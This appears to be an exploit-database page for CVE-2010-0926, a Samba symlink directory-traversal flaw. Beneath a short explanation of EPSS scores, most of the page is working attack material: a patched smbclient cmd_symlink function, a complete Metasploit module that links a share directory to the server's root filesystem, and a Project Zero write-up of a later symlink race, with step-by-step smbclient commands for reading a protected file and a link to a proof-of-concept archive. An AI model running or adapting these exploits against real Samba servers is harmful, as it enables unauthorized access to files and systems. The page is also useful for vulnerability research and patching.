CVE-2010-0926 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

source: https://www.securityfocus.com/bid/38111/info Samba is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. Exploits would allow an attacker to access files outside of the Samba user's root directory to obtain sensitive information and perform other attacks. To exploit this issue, attackers require authenticated access to a writable share. Note that this issue may be exploited through a writable share accessible by guest accounts. NOTE: The vendor stated that this issue stems from an insecure default configuration. The Samba team advises administrators to set 'wide links = no' in the '[global]' section of 'smb.conf'. smbclient patch (exploit): samba-3.4.5/source3/client/client.c /**************************************************************************** UNIX symlink. ****************************************************************************/ static int cmd_symlink(void) { TALLOC_CTX *ctx = talloc_tos(); char *oldname = NULL; char *newname = NULL; char *buf = NULL; char *buf2 = NULL; char *targetname = NULL; struct cli_state *targetcli; if (!next_token_talloc(ctx, &cmd_ptr,&buf,NULL) || !next_token_talloc(ctx, &cmd_ptr,&buf2,NULL)) { d_printf("symlink <oldname> <newname>\n"); return 1; } oldname = talloc_asprintf(ctx, "%s", // << HERE modified buf); if (!oldname) { return 1; } newname = talloc_asprintf(ctx, "%s", // << HERE modified buf2); if (!newname) { return 1; } /* ORIGINAL SMBCLIENT SOURCE LINES TO BE MODIFIED (SEE ABOVE). oldname = talloc_asprintf(ctx, "%s%s", // < modified (see above) client_get_cur_dir(), // < removed (see above) buf); if (!oldname) { return 1; } newname = talloc_asprintf(ctx, "%s%s", // < modified (see above) client_get_cur_dir(), // < removed (see above) buf2); if (!newname) { return 1; } ----------------------------------------------*/ if (!cli_resolve_path(ctx, "", auth_info, cli, oldname, &targetcli, &targetname)) { d_printf("link %s: %s\n", oldname, cli_errstr(cli)); return 1; } if (!SERVER_HAS_UNIX_CIFS(targetcli)) { d_printf("Server doesn't support UNIX CIFS calls.\n"); return 1; } if (!cli_unix_symlink(targetcli, targetname, newname)) { d_printf("%s symlinking files (%s -> %s)\n", cli_errstr(targetcli), newname, targetname); return 1; } return 0; } // Cheers, // kcope

source: https://www.securityfocus.com/bid/38111/info Samba is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. Exploits would allow an attacker to access files outside of the Samba user's root directory to obtain sensitive information and perform other attacks. To exploit this issue, attackers require authenticated access to a writable share. Note that this issue may be exploited through a writable share accessible by guest accounts. NOTE: The vendor stated that this issue stems from an insecure default configuration. The Samba team advises administrators to set 'wide links = no' in the '[global]' section of 'smb.conf'. ## # $Id: samba_symlink_traversal.rb 8369 2010-02-05 06:38:24Z hdm $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB include Msf::Auxiliary::Report # Aliases for common classes SIMPLE = Rex::Proto::SMB::SimpleClient XCEPT = Rex::Proto::SMB::Exceptions CONST = Rex::Proto::SMB::Constants def initialize super( 'Name' => 'Samba Symlink Directory Traversal', 'Version' => '$Revision: 8369 $', 'Description' => %Q{ This module exploits a directory traversal flaw in the Samba CIFS server. To exploit this flaw, a writeable share must be specified. The newly created directory will link to the root filesystem. }, 'Author' => [ 'kcope', # http://lists.grok.org.uk/pipermail/full-disclosure/2010-February/072927.html 'hdm' # metasploit module ], 'License' => MSF_LICENSE ) register_options([ OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server']), OptString.new('SMBTARGET', [true, 'The name of the directory that should point to the root filesystem', 'rootfs']) ], self.class) end def run print_status("Connecting to the server...") connect() smb_login() print_status("Trying to mount writeable share #{datastore['SMBSHARE']}...") self.simple.connect(datastore['SMBSHARE']) print_status("Trying to link '#{datastore['SMBTARGET']}' to the root filesystem...") self.simple.client.symlink(datastore['SMBTARGET'], "../" * 10) print_status("Now access the following share to browse the root filesystem:") print_status("\t\\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{datastore['SMBTARGET']}\\") print_line("") end end

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1039 The Samba server is supposed to only grant access to configured share directories unless "wide links" are enabled, in which case the server is allowed to follow symlinks. The default (since CVE-2010-0926) is that wide links are disabled. smbd ensures that it isn't following symlinks by calling lstat() on every path component, as can be seen in strace (in reaction to the request "get a/b/c/d/e/f/g/h/i/j", where /public is the root directory of the share): root@debian:/home/user# strace -e trace=file -p18954 Process 18954 attached lstat("a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0 getcwd("/public", 4096) = 8 lstat("/public/a", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 lstat("/public/a/b", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 lstat("/public/a/b/c", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 lstat("/public/a/b/c/d", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 lstat("/public/a/b/c/d/e", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 lstat("/public/a/b/c/d/e/f", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 lstat("/public/a/b/c/d/e/f/g", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 lstat("/public/a/b/c/d/e/f/g/h", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 lstat("/public/a/b/c/d/e/f/g/h/i", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 lstat("/public/a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0 stat("a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0 getxattr("a/b/c/d/e/f/g/h/i/j", "system.posix_acl_access", 0x7ffc8d870c30, 132) = -1 ENODATA (No data available) stat("a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0 open("a/b/c/d/e/f/g/h/i/j", O_RDONLY) = 35 This is racy: Any of the path components - either one of the directories or the file at the end - could be replaced with a symlink by an attacker over a second connection to the same share. For example, replacing a/b/c/d/e/f/g/h/i with a symlink to / immediately before the open() call would cause smbd to open /j. To reproduce: - Set up a server with Samba 4.5.2. (I'm using Samba 4.5.2 from Debian unstable. I'm running the attacks on a native machine while the server is running in a VM on the same machine.) - On the server, create a world-readable file "/secret" that contains some text. The goal of the attacker is to leak the contents of that file. - On the server, create a directory "/public", mode 0777. - Create a share named "public", accessible for guests, writable, with path "/public". - As the attacker, patch a copy of the samba-4.5.2 sourcecode with the patch in attack_commands.patch. - Build the patched copy of samba-4.5.2. The built smbclient will be used in the following steps. - Prepare the server's directory layout remotely and start the rename side of the race: $ ./bin/default/source3/client/smbclient -N -U guest //192.168.56.101/public ./bin/default/source3/client/smbclient: Can't load /usr/local/samba/etc/smb.conf - run testparm to debug it Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.5.2-Debian] smb: \> posix Server supports CIFS extensions 1.0 Server supports CIFS capabilities locks acls pathnames posix_path_operations large_read posix_encrypt smb: /> ls . D 0 Wed Dec 14 23:54:30 2016 .. D 0 Wed Dec 14 13:02:50 2016 98853468 blocks of size 1024. 66181136 blocks available smb: /> symlink / link smb: /> mkdir normal smb: /> put /tmp/empty normal/secret # empty file putting file /tmp/empty as /normal/secret (0.0 kb/s) (average 0.0 kb/s) smb: /> rename_loop link normal foobar - Over a second connection, launch the read side of the race: $ ./bin/default/source3/client/smbclient -N -U guest //192.168.56.101/public ./bin/default/source3/client/smbclient: Can't load /usr/local/samba/etc/smb.conf - run testparm to debug it Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.5.2-Debian] smb: \> posix Server supports CIFS extensions 1.0 Server supports CIFS capabilities locks acls pathnames posix_path_operations large_read posix_encrypt smb: /> dump foobar/secret - At this point, the race can theoretically be hit. However, because the renaming client performs operations synchronously, the network latency makes it hard to win the race. (It shouldn't be too hard to adapt the SMB client to be asynchronous, which would make the attack much more practical.) To make it easier to hit the race, log in to the server as root and run "strace" against the process that is trying to access foobar/secret all the time without any filtering ("strace -p19624"). On my machine, this causes the race to be hit every few seconds, and the smbclient that is running the "dump" command prints the contents of the file each time the race is won. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41740.zip